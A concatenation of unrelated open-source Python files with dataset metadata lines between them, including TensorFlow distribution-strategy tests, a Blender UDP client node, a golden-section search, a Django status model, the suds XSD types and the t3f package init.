combinations.times(
strategy_combinations.distributions_and_v1_and_v2_optimizers(),
combinations.combine(mode=["graph", "eager"])) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1_and_v2,
mode=["graph"]))
def testOptimizerInsideModelFn(self, distribution, optimizer_fn):
created_variables = []
trainable_variables = []
def appending_creator(next_creator, *args, **kwargs):
v = next_creator(*args, **kwargs)
created_variables.append(v.name)
if "trainable" in kwargs and kwargs["trainable"]:
trainable_variables.append(v.name)
return v
# Creator scope needs to be set before it's used inside
# `distribution.scope`.
with variable_scope.variable_creator_scope(
appending_creator), distribution.scope():
model_fn, dataset_fn, _ = minimize_loss_example(
optimizer_fn,
use_bias=True,
use_callable_loss=True,
create_optimizer_inside_model_fn=True)
def step_fn(ctx, inputs):
del ctx # Unused
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=1).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
run_step()
def get_expected_variables(optimizer_fn, num_parameter_devices):
optimizer = optimizer_fn()
name = optimizer._name
if isinstance(optimizer, optimizer_v2.OptimizerV2):
variables = VAR_MAP_V2[name]
else:
variables = VAR_MAP_V1[name]
extended_variables = [
v + "/replica_{}".format(replica)
for v in variables
for replica in range(1, num_parameter_devices)
]
variables = list(variables) + extended_variables
return set([v + ":0" for v in variables])
self.assertEqual(
get_expected_variables(optimizer_fn,
len(distribution.extended.parameter_devices)),
set(created_variables))
@combinations.generate(
combinations.times(
combinations.combine(momentum=[0.8, 0.9, 0.99], renorm=[False, True]),
combinations.times(
strategy_combinations.distributions_and_v1_and_v2_optimizers(),
combinations.combine(
mode=["graph", "eager"],
# TODO(isaprykin): Allow False here. Currently subsequent
# replicas will re-execute UPDATE_OPS of previous replicas.
update_ops_in_cross_replica_mode=[True])) +
combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1_and_v2,
mode=["graph"],
update_ops_in_cross_replica_mode=[False])))
def testTrainNetworkWithBatchNorm(self, distribution, optimizer_fn, momentum,
renorm, update_ops_in_cross_replica_mode):
"""Verifies that moving mean updates are reduced across replicas."""
with distribution.scope():
num_replicas = distribution.num_replicas_in_sync
model_fn, dataset_fn, batchnorm = batchnorm_example(
optimizer_fn,
batch_per_epoch=num_replicas,
momentum=momentum,
renorm=renorm,
update_ops_in_replica_mode=not update_ops_in_cross_replica_mode)
def step_fn(ctx, inputs):
del ctx # Unused
fetches = distribution.experimental_local_results(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
if update_ops_in_cross_replica_mode:
fetches += tuple(ops.get_collection(ops.GraphKeys.UPDATE_OPS))
return control_flow_ops.group(fetches)
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=1).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
expected_moving_means = [0.] * 8
def averaged_batch_mean(i):
      # Each batch has shape [16, 8] where the ith element in the jth list is
      # (8 * j + i + replica_id * 100). So the batch mean in each replica is
      # (60 + i + replica_id * 100), and the batch mean over all replicas
      # works out to:
return 60. + i + (num_replicas - 1.) / 2. * 100.
for _ in range(10):
run_step()
moving_means = self.evaluate(batchnorm.moving_mean)
# We make sure that the moving_mean is updated as if the sample mean is
# calculated over all replicas.
for i, expected_moving_mean in enumerate(expected_moving_means):
expected_moving_means[i] -= ((
expected_moving_mean - averaged_batch_mean(i)) * (1.0 - momentum))
self.assertNear(expected_moving_means[i], moving_means[i], 0.0001)
@combinations.generate(
combinations.times(
combinations.combine(loss_reduction=[
losses_impl.Reduction.SUM, losses_impl.Reduction.MEAN,
losses_impl.Reduction.SUM_OVER_BATCH_SIZE,
losses_impl.Reduction.SUM_OVER_NONZERO_WEIGHTS
]),
combinations.times(
combinations.combine(distribution=[
strategy_combinations.one_device_strategy,
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
strategy_combinations.mirrored_strategy_with_two_gpus
]),
combinations.times(
combinations.combine(optimizer_fn=strategy_combinations
.gradient_descent_optimizer_v1_fn),
combinations.combine(
mode=["graph"], use_callable_loss=[True, False]) +
combinations.combine(
mode=["eager"], use_callable_loss=[True])) +
combinations.times(
combinations.combine(optimizer_fn=strategy_combinations
.gradient_descent_optimizer_keras_v2_fn),
combinations.combine(
mode=["graph", "eager"], use_callable_loss=[True]))) +
combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations
.gradient_descent_optimizer_v1_fn,
mode=["graph"],
use_callable_loss=[True, False]) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations
.gradient_descent_optimizer_keras_v2_fn,
mode=["graph"],
use_callable_loss=[True])))
def testMeanVsSum(self, distribution, optimizer_fn, loss_reduction,
use_callable_loss):
with distribution.scope():
all_vars = []
def model_fn(inputs):
x, y = inputs
w = variable_scope.get_variable("w", initializer=[[2.]])
all_vars.append(w)
def loss_fn():
# Use fixed initialization to make the steps deterministic.
predict = math_ops.matmul(x, w)
return losses_impl.mean_squared_error(
y, predict, reduction=loss_reduction)
optimizer = optimizer_fn() # GradientDescent with 0.2 learning rate
if isinstance(optimizer, optimizer_v2.OptimizerV2):
return optimizer.minimize(loss_fn, [w])
else:
if use_callable_loss:
return optimizer.minimize(loss_fn)
else:
return optimizer.minimize(loss_fn())
def dataset_fn():
features = dataset_ops.Dataset.from_tensors([[2.], [7.]])
labels = dataset_ops.Dataset.from_tensors([[6.], [21.]])
return dataset_ops.Dataset.zip((features, labels)).repeat()
def step_fn(ctx, inputs):
del ctx # Unused
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=1).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
run_step()
v = all_vars[0]
self.assertTrue(all(v is vi for vi in all_vars[1:]))
weight = numpy.squeeze(self.evaluate(v))
# Our model is:
# predict = x * w
# loss = (predict - y)^2
# dloss/dpredict = 2*(predict - y)
# dloss/dw = 2 * x^T @ (predict - y)
# For our batch size of 2, assuming sum loss reduction:
# x = [2, 7]
# y = [6, 21]
# w_initial = 2
# predict = [4, 14]
# predict - y = [-2, -7]
# dloss/dw = 2 <[2, 7], [-2, -7]> = - 2(4 + 49) = -106
# So unreplicated the update to w with lr=0.2 is -0.2 * -106 = 21.2
# with sum loss reduction, or 10.6 with mean.
if loss_reduction == losses_impl.Reduction.SUM:
# Note that the "distribution.num_replicas_in_sync" factor will go away
# once we split the input across replicas, instead of pulling a complete
# batch of input per replica.
self.assertNear(weight, 2 + 21.2 * distribution.num_replicas_in_sync,
0.0001)
else:
# One of the mean loss reductions.
self.assertNear(weight, 2 + 10.6, 0.0001)
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_and_v2_optimizers(),
combinations.combine(mode=["graph", "eager"]),
combinations.combine(is_tpu=[False])) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1_and_v2,
mode=["graph"],
is_tpu=[True]))
def testRunStepsWithOutputContext(self, distribution, optimizer_fn, is_tpu):
with distribution.scope():
def dataset_fn():
dataset = dataset_ops.Dataset.from_tensors([[1.]]).repeat()
# TODO(priyag): batch with drop_remainder=True causes shapes to be
# fully defined for TPU. Remove this when XLA supports dynamic shapes.
return dataset.batch(batch_size=1, drop_remainder=True)
optimizer = optimizer_fn()
layer = core.Dense(1, use_bias=True)
key1 = "foo"
value1 = "bar"
def model_fn(output_context, x):
"""A very simple model written by the user."""
def loss_fn():
y = array_ops.reshape(layer(x), []) - constant_op.constant(1.)
return y * y
if isinstance(optimizer, optimizer_v2.OptimizerV2):
train_op = optimizer.minimize(
loss_fn, lambda: layer.trainable_variables)
else:
train_op = optimizer.minimize(loss_fn)
loss = loss_fn()
output_context.set_last_step_output(
name="replica_loss_reduced",
output=loss,
reduce_op=reduce_util.ReduceOp.MEAN)
output_context.set_non_tensor_output(key1, value1)
return (train_op, loss)
def step_fn(output_context, inputs):
(train_op, loss) = distribution.extended.call_for_each_replica(
model_fn, args=(output_context, inputs))
output_context.set_last_step_output(
name="cross_replica_loss_reduced",
output=loss,
reduce_op=reduce_util.ReduceOp.MEAN)
output_context.set_last_step_output(
name="cross_replica_loss_not_reduced",
output=loss)
return distribution.group(train_op)
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
initial_loss = lambda: constant_op.constant(1e7)
# Initial values corresponding to reduced losses are just single
# tensors. But for non reduced losses, we need to have initial
# values that are of the same structure as non reduced losses. In
# MirroredStrategy, this will be a list of losses, in TPUStrategy
# it will be single tensor. Using `call_for_each_replica` followed
# by `experimental_local_results` gives us the desired initial
# value structure.
not_reduced = distribution.experimental_local_results(
distribution.extended.call_for_each_replica(initial_loss))
initial_loop_values = {
"replica_loss_reduced": initial_loss(),
"cross_replica_loss_reduced": initial_loss(),
"cross_replica_loss_not_reduced": not_reduced,
}
ctx = distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=2,
initial_loop_values=initial_loop_values)
self.assertEqual({key1: (value1,)}, ctx.non_tensor_outputs)
self._verify_loss_output(
initial_loss(),
loss_output=ctx.last_step_outputs["replica_loss_reduced"],
reduced=True, distribution=distribution)
self._verify_loss_output(
initial_loss(),
loss_output=ctx.last_step_outputs["cross_replica_loss_reduced"],
reduced=True, distribution=distribution)
self._verify_loss_output(
initial_loss(),
loss_output=ctx.last_step_outputs["cross_replica_loss_not_reduced"],
reduced=False, distribution=distribution)
return (ctx.run_op, ctx.last_step_outputs["replica_loss_reduced"])
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
weights, biases, losses = [], [], []
for _ in range(5):
_, loss = run_step()
losses.append(loss)
weights.append(self.evaluate(layer.kernel))
biases.append(self.evaluate(layer.bias))
loss_is_not_increasing = all(y <= x for x, y in zip(losses, losses[1:]))
self.assertTrue(loss_is_not_increasing)
error = abs(
numpy.add(numpy.squeeze(weights), numpy.squeeze(biases)) - 1)
error_is_not_increasing = all(y <= x for x, y in zip(error, error[1:]))
self.assertTrue(error_is_not_increasing)
def _verify_loss_output(self, initial_loss, loss_output, reduced,
distribution):
if not reduced:
self.assertLen(distribution.experimental_local_results(loss_output),
distribution.num_replicas_in_sync)
loss_tensor = distribution.reduce(reduce_util.ReduceOp.MEAN, loss_output,
axis=None)
else:
unwrapped_output = distribution.experimental_local_results(loss_output)
self.assertLen(unwrapped_output, 1)
loss_tensor = unwrapped_output[0]
self.assertEqual(initial_loss.dtype, loss_tensor.dtype)
self.assertEqual(initial_loss.shape, loss_tensor.shape)
if __name__ == "__main__":
test.main()
| apache-2.0 | 2,174,429,013,716,935,700 | 41.14611 | 82 | 0.62397 | false |
portnov/sverchok | nodes/network/udp_client.py | 1 | 3820 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import socket
import bpy
from bpy.props import IntProperty, FloatProperty, EnumProperty, StringProperty, BoolProperty
from sverchok.node_tree import SverchCustomTreeNode, StringsSocket
from sverchok.utils.profile import profile
from sverchok.data_structure import updateNode
class UdpClientNode(bpy.types.Node, SverchCustomTreeNode):
bl_idname = 'UdpClientNode'
bl_label = 'UDP Client'
def send_msg(self, context):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(0)
sock.sendto(bytes(self.send, 'UTF-8'), (self.ip, self.port))
def recv_msg(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(0)
sock.settimeout(self.timeout)
try:
data, _ = sock.recvfrom(self.buffer_size)
self.receive = data.decode('UTF-8')
except socket.timeout:
print('Timeout')
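    # The two handlers above are plain UDP datagram calls; a minimal
    # standalone sketch of the same socket pattern, usable outside Blender
    # (address, port and payload are illustrative):
    #
    #     import socket
    #     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    #     sock.sendto(b'[[1, 2, 3]]', ('127.0.0.1', 9250))  # like send_msg
    #     sock.settimeout(0.5)
    #     try:
    #         data, addr = sock.recvfrom(8192)              # like recv_msg
    #     except socket.timeout:
    #         data = None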
send = StringProperty(name='send',
description='Message to send',
default='message',
update=send_msg)
receive = StringProperty(name='receive',
description='Received message',
default='',
update=updateNode)
ip = StringProperty(name='ip',
description='IP address of server',
default='127.0.0.1')
port = IntProperty(name='port',
description='Port number to send message',
default=9250)
buffer_size = IntProperty(name='buffer_size',
description='Size of buffer',
default=8192)
timeout = FloatProperty(name='timeout',
description='Timeout (sec)',
default=0.5)
active = BoolProperty(default=False, name='Active')
def draw_buttons(self, context, layout):
layout.prop(self, 'active', text='Active')
layout.prop(self, 'ip', text='IP')
layout.prop(self, 'port', text='Port')
layout.prop(self, 'buffer_size', text='Buffer')
layout.prop(self, 'timeout', text='Timeout')
def sv_init(self, context):
self.inputs.new('StringsSocket', 'send', 'send').prop_name = 'send'
self.outputs.new('StringsSocket', 'receive', 'receive')
@profile
def process(self):
if not self.active:
return
print(type(self.send),type(self.ip),type(self.port))
input_value = self.inputs[0].sv_get()
if self.send != str(input_value):
self.send = str(input_value)
#self.send_msg(bpy.context)
if self.outputs['receive'].is_linked:
self.recv_msg()
self.outputs['receive'].sv_set(self.receive)
def register():
bpy.utils.register_class(UdpClientNode)
def unregister():
bpy.utils.unregister_class(UdpClientNode)
if __name__ == '__main__':
register() | gpl-3.0 | 7,752,315,496,420,771,000 | 32.517544 | 92 | 0.605236 | false |
rlowrance/mlpack | minimize_1d_golden_section.py | 1 | 1783 | '''golden section search to minimize a function of one variable in [low,high]
NOTE: the function fun is assumed to be unimodal
RETURN
low
high, such that the minimizer is in [low,high]
 dict, dictionary with function evaluations dict[x] = f(x)
ARGS
fun(x) -> number
low -> number
high -> number
 tolerance -> number, required absolute precision of x: iterate until high - low <= tolerance
ref: heath-02 p.270 golden section search
'''
import math
import pdb
import unittest
def golden_section(fun, low, high, tolerance, verbose=False):
assert low < high
d = {}
def func(x):
result = fun(x)
d[x] = result
return result
tau = (math.sqrt(5.0) - 1) / 2.0
x1 = low + (1 - tau) * (high - low)
f1 = func(x1)
x2 = low + tau * (high - low)
f2 = func(x2)
while (high - low) > tolerance:
if verbose:
print x1, f1, x2, f2
if f1 > f2:
low = x1
x1 = x2
f1 = f2
x2 = low + tau * (high - low)
f2 = func(x2)
else:
high = x2
x2 = x1
f2 = f1
x1 = low + (1 - tau) * (high - low)
f1 = func(x1)
return low, high, d
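# Example of the expected call pattern (the quadratic below is only an
# illustration; any unimodal function over [low, high] works):
#
#     low, high, evals = golden_section(lambda x: (x - 1.5) ** 2, 0.0, 4.0, 1e-4)
#     best_x = 0.5 * (low + high)  # midpoint of the final bracket
#     # evals maps every sampled x to f(x), handy for plotting or debugging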
class Test(unittest.TestCase):
def setUp(self):
self.verbose = False
def test(self):
# from heath-02 p. 272
def fun(x):
return 0.5 - x * math.exp(- x * x)
low_star, high_star, d = \
golden_section(fun, 0.0, 2.0, .001, verbose=self.verbose)
if self.verbose:
print 'low_star', low_star, 'high_star', high_star
self.assertLess(abs(low_star - .706565), 1e-3)
self.assertLess(abs(high_star - .707471), 1e-3)
if __name__ == '__main__':
if False:
pdb.set_trace()
unittest.main()
| mit | 3,258,253,841,374,939,000 | 22.773333 | 77 | 0.53281 | false |
jdepoix/goto_cloud | goto_cloud/status_model/models.py | 1 | 2281 | from abc import abstractmethod
from django.db import models
from enums.public import StringEnum
from tracked_model.public import TrackedModel
from .lifecycle_management import ObjectStatusLifecycleManager, StatusLifecycle
class StatusModel(TrackedModel):
"""
    This Model can be inherited by models which have a status in a lifecycle. The property model.lifecycle_manager
    returns an ObjectStatusLifecycleManager containing the relevant lifecycle.
"""
class InvalidStatusException(Exception):
"""
raise if a status is invalid
"""
pass
class Status(StringEnum):
pass
@property
@abstractmethod
def lifecycle(self):
"""
:return: the lifecycle of statuses this StatusModel relies on
:rtype: tuple
"""
raise NotImplementedError('implement abstractproperty lifecycle!')
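    # Sketch of a concrete subclass (model and status names are made up):
    #
    #     class Migration(StatusModel):
    #         class Status(StatusModel.Status):
    #             DRAFT = 'DRAFT'
    #             RUNNING = 'RUNNING'
    #             DONE = 'DONE'
    #
    #         @property
    #         def lifecycle(self):
    #             return (self.Status.DRAFT, self.Status.RUNNING,
    #                     self.Status.DONE)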
def __init__(self, *args, **kwargs):
self._status_lifecycle = StatusLifecycle(*self.lifecycle)
self._lifecycle_manager = ObjectStatusLifecycleManager(self._status_lifecycle, self, 'status')
self._meta.get_field('status').default = self._status_lifecycle.statuses[0]
self._meta.get_field('status').choices = self.Status.get_django_choices()
super().__init__(*args, **kwargs)
def save(self, *args, **kwargs):
if not self._lifecycle_manager.is_status_valid(self.status):
raise StatusModel.InvalidStatusException('status: {status} is not valid'.format(
status=self.status
))
return super().save(*args, **kwargs)
status = models.CharField(max_length=255)
def increment_status(self):
"""
increments the status of this StatusModel
:raises: ObjectStatusLifecycleManager.InvalidStatusException in case there is no next status
"""
self.status = self._lifecycle_manager.get_next_status()
self.save()
def decrement_status(self):
"""
decrements the status of this StatusModel
:raises: ObjectStatusLifecycleManager.InvalidStatusException in case there is no previous status
"""
self.status = self._lifecycle_manager.get_previous_status()
self.save()
class Meta:
abstract = True
| mit | 7,181,498,220,778,321,000 | 31.126761 | 114 | 0.665498 | false |
GorillaNation/pipestash | pipestash/__init__.py | 1 | 3148 | import socket
import optparse
import sys
def parseargs():
def parse_field_args(option, opt_str, value, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
else:
del parser.rargs[:len(args)]
break
if getattr(parser.values, option.dest):
args.extend(getattr(parser.values, option.dest))
setattr(parser.values, option.dest, args)
# parse command line
parser = optparse.OptionParser()
parser.add_option('-t', '--type', dest='type', help='the event type (required)')
parser.add_option('-r','--redis-url', dest='redis_url', help="specify the URL of the redis database to use, defaults to redis://localhost:6379/0", default='redis://localhost:6379/0')
parser.add_option('-R', '--redis-key', dest='redis_key', help="redis key to add events to, defaults to logstash", default='logstash')
parser.add_option('-T','--tags', dest='tags', action='callback', callback=parse_field_args, help="tags to add to the event", default=[])
parser.add_option('-f', '--fields', dest='fields', action='callback', callback=parse_field_args, metavar='field=value', help="fields to add to the event, FIELD=VALUE, separated by spaces", default=[])
parser.add_option('-s', '--source-path', dest='source_path', help="specify the @source_path field, defaults to 'stdin'", default='stdin')
parser.add_option('-S', '--source-host', dest='source_host', help="specify the @source_host field, defaults to the machine's FQDN", default=socket.getfqdn())
parser.add_option('-O', '--stdout', dest='stdout', help="print read lines to stdout as well as to redis", action="store_true")
parser.add_option('-v', '--verbose', dest='verbose', help="enable verbose mode", action="store_true")
parser.add_option('-q', '--queue-size', dest='queue_size', help="set the maximum size for the internal queue in number of messages, defaults to 10000", default=10000, type="int")
parser.add_option('-B', '--block', dest='block', help="block reads if the queue is full. defaults to False", default=False, action='store_true')
parser.add_option('-w', '--timeout', dest='timeout', help="if pipestash is unable to connect to redis or redis runs OOM, put the consumer thread to sleep a random amount of time between `-w seconds` and +0 seconds. defaults to 20 seconds", default=20, type="float")
parser.add_option('-n', '--nice', dest='nice', help="sets the niceness value of the process", default=5, type="int")
options, _ = parser.parse_args()
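	# Typical invocation this parser is meant to handle (values illustrative):
	#
	#   tail -F /var/log/app.log | pipestash -t applog \
	#       -r redis://localhost:6379/0 -R logstash \
	#       -T production web -f role=frontend dc=us-east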
# required fields validation
if not options.type:
parser.error('-t|--type is a required argument')
# set source
options.source = "file:///{0}/{1}".format(options.source_host, options.source_path)
# parse out fields
fields = {}
for fieldargs in options.fields:
a,_,b = fieldargs.partition("=")
fields[a] = b
options.fields = fields
# verbose output
if options.verbose:
def verbose(s):
print >> sys.stderr, s
else:
def verbose(s):
pass
return options
| bsd-3-clause | 7,890,449,419,665,262,000 | 55.214286 | 269 | 0.645172 | false |
sfriesel/suds | suds/xsd/sxbuiltin.py | 1 | 6653 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
The I{sxbuiltin} module provides classes that represent
XSD I{builtin} schema objects.
"""
from suds import *
from suds.xsd import *
from suds.sax.date import *
from suds.xsd.sxbase import XBuiltin
import datetime as dt
from logging import getLogger
log = getLogger(__name__)
class XString(XBuiltin):
"""
Represents an (xsd) <xs:string/> node
"""
pass
class XAny(XBuiltin):
"""
Represents an (xsd) <any/> node
"""
def __init__(self, schema, name):
XBuiltin.__init__(self, schema, name)
self.nillable = False
def get_child(self, name):
child = XAny(self.schema, name)
return child, []
def any(self):
return True
class XBoolean(XBuiltin):
"""
Represents an (xsd) boolean builtin type.
"""
translation = ({'1':True, 'true':True, '0':False, 'false':False},
{True:'true', 1:'true', False:'false', 0:'false'})
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring):
return XBoolean.translation[0].get(value)
else:
if isinstance(value, (bool, int)):
return XBoolean.translation[1].get(value)
return value
class XInteger(XBuiltin):
"""
Represents an (xsd) xs:int builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return int(value)
else:
if isinstance(value, int):
return str(value)
return value
class XLong(XBuiltin):
"""
Represents an (xsd) xs:long builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return long(value)
else:
if isinstance(value, (int, long)):
return str(value)
return value
class XFloat(XBuiltin):
"""
Represents an (xsd) xs:float builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return float(value)
else:
if isinstance(value, float):
return str(value)
return value
class XDate(XBuiltin):
"""
Represents an (xsd) xs:date builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return Date(value).date
else:
if isinstance(value, dt.date):
return str(Date(value))
return value
class XTime(XBuiltin):
"""
Represents an (xsd) xs:time builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return Time(value).time
else:
if isinstance(value, dt.date):
return str(Time(value))
return value
class XDateTime(XBuiltin):
"""
Represents an (xsd) xs:datetime builtin type.
"""
def translate(self, value, topython=True):
if topython:
if isinstance(value, basestring) and len(value):
return DateTime(value).datetime
else:
if isinstance(value, dt.date):
return str(DateTime(value))
return value
class Factory:
tags =\
{
# any
'anyType' : XAny,
# strings
'string' : XString,
'normalizedString' : XString,
'ID' : XString,
'Name' : XString,
'QName' : XString,
'NCName' : XString,
'anySimpleType' : XString,
'anyURI' : XString,
'NOTATION' : XString,
'token' : XString,
'language' : XString,
'IDREFS' : XString,
'ENTITIES' : XString,
'IDREF' : XString,
'ENTITY' : XString,
'NMTOKEN' : XString,
'NMTOKENS' : XString,
# binary
'hexBinary' : XString,
'base64Binary' : XString,
# integers
'int' : XInteger,
'integer' : XInteger,
'unsignedInt' : XInteger,
'positiveInteger' : XInteger,
'negativeInteger' : XInteger,
'nonPositiveInteger' : XInteger,
'nonNegativeInteger' : XInteger,
# longs
'long' : XLong,
'unsignedLong' : XLong,
# shorts
'short' : XInteger,
'unsignedShort' : XInteger,
'byte' : XInteger,
'unsignedByte' : XInteger,
# floats
'float' : XFloat,
'double' : XFloat,
'decimal' : XFloat,
# dates & times
'date' : XDate,
'time' : XTime,
'dateTime': XDateTime,
'duration': XString,
'gYearMonth' : XString,
'gYear' : XString,
'gMonthDay' : XString,
'gDay' : XString,
'gMonth' : XString,
# boolean
'boolean' : XBoolean,
}
@classmethod
def maptag(cls, tag, fn):
"""
Map (override) tag => I{class} mapping.
@param tag: An xsd tag name.
@type tag: str
@param fn: A function or class.
@type fn: fn|class.
"""
cls.tags[tag] = fn
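    # Example of overriding a builtin mapping; the custom class here is an
    # assumption for illustration, not something shipped with suds:
    #
    #     class XDecimalAsString(XString):
    #         pass
    #
    #     Factory.maptag('decimal', XDecimalAsString)
    #
    # After this, create() resolves xs:decimal to the custom class instead
    # of the default XFloat.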
@classmethod
def create(cls, schema, name):
"""
Create an object based on the root tag name.
@param schema: A schema object.
@type schema: L{schema.Schema}
@param name: The name.
@type name: str
@return: The created object.
@rtype: L{XBuiltin}
"""
fn = cls.tags.get(name)
if fn is not None:
return fn(schema, name)
return XBuiltin(schema, name)
| lgpl-3.0 | -2,954,499,898,351,151,600 | 25.505976 | 76 | 0.563655 | false |
Bihaqo/t3f | t3f/__init__.py | 1 | 3157 | from t3f.tensor_train_base import TensorTrainBase
from t3f.tensor_train import TensorTrain
from t3f.tensor_train_batch import TensorTrainBatch
from t3f.variables import assign
from t3f.variables import get_variable
from t3f.ops import add
from t3f.ops import cast
from t3f.ops import flat_inner
from t3f.ops import frobenius_norm
from t3f.ops import frobenius_norm_squared
from t3f.ops import full
from t3f.ops import matmul
from t3f.ops import multiply
from t3f.ops import quadratic_form
from t3f.ops import bilinear_form
from t3f.ops import transpose
from t3f.ops import gather_nd
from t3f.ops import renormalize_tt_cores
from t3f.batch_ops import concat_along_batch_dim
from t3f.batch_ops import gram_matrix
from t3f.batch_ops import multiply_along_batch_dim
from t3f.batch_ops import pairwise_flat_inner
from t3f.initializers import matrix_with_random_cores
from t3f.initializers import matrix_batch_with_random_cores
from t3f.initializers import tensor_with_random_cores
from t3f.initializers import tensor_batch_with_random_cores
from t3f.initializers import random_tensor
from t3f.initializers import random_tensor_batch
from t3f.initializers import random_matrix
from t3f.initializers import random_matrix_batch
from t3f.initializers import tensor_ones
from t3f.initializers import tensor_zeros
from t3f.initializers import matrix_ones
from t3f.initializers import matrix_zeros
from t3f.initializers import eye
from t3f.initializers import ones_like
from t3f.initializers import zeros_like
from t3f.initializers import glorot_initializer
from t3f.initializers import he_initializer
from t3f.initializers import lecun_initializer
from t3f.regularizers import cores_regularizer
from t3f.regularizers import l2_regularizer
from t3f.riemannian import add_n_projected
from t3f.riemannian import pairwise_flat_inner_projected
from t3f.riemannian import project
from t3f.riemannian import project_matmul
from t3f.riemannian import project_sum
from t3f.riemannian import tangent_space_to_deltas
from t3f.shapes import batch_size
from t3f.shapes import clean_raw_shape
from t3f.shapes import expand_batch_dim
from t3f.shapes import is_batch_broadcasting_possible
from t3f.shapes import lazy_batch_size
from t3f.shapes import lazy_raw_shape
from t3f.shapes import lazy_shape
from t3f.shapes import lazy_tt_ranks
from t3f.shapes import raw_shape
from t3f.shapes import shape
from t3f.shapes import squeeze_batch_dim
from t3f.shapes import tt_ranks
from t3f.decompositions import orthogonalize_tt_cores
from t3f.decompositions import round
from t3f.decompositions import to_tt_matrix
from t3f.decompositions import to_tt_tensor
from t3f.autodiff import gradients
from t3f.autodiff import hessian_vector_product
import t3f.approximate
import t3f.kronecker
import t3f.nn
import t3f.utils
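# Rough usage sketch built from names imported above (shapes and ranks are
# arbitrary examples, keyword names assumed from the t3f API):
#
#     a = random_tensor((3, 4, 5), tt_rank=2)
#     b = multiply(a, a)
#     b_rounded = round(b, max_tt_rank=2)
#     dense = full(b_rounded)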
_directly_imported = ['tensor_train_base', 'tensor_train', 'tensor_train_batch',
'variables', 'ops', 'batch_ops', 'initializers',
'regularizers', 'riemannian', 'shapes', 'decompositions',
'autodiff']
__all__ = [s for s in dir() if
s not in _directly_imported and not s.startswith('_')]
| mit | 8,852,712,789,191,167,000 | 34.875 | 80 | 0.803928 | false |
sporto/rails_go_to_spec | resolver_test.py | 1 | 5072 | # to run
# python resolver_test.py
import unittest
try:
from .resolver import *
except ImportError:
from resolver import *
class ResolverTest(unittest.TestCase):
def test_is_spec_returns_true(self):
file = '/spec/foo/something_spec.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, True)
def test_is_spec_returns_true_for_erb_spec(self):
file = '/spec/views/something.html.erb_spec.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, True)
def test_is_spec_returns_false(self):
file = '/app/foo/something.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, False)
def test_is_spec_returns_false_for_erb(self):
file = '/spec/views/something.html.erb.rb'
r = Resolver().is_spec(file)
self.assertEqual(r, False)
def test_is_spec_returns_false_for_jbuilder(self):
file = '/spec/views/something.json.jbuilder'
r = Resolver().is_spec(file)
self.assertEqual(r, False)
# get_source
def test_finds_source(self):
file = '/spec/something/foo_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
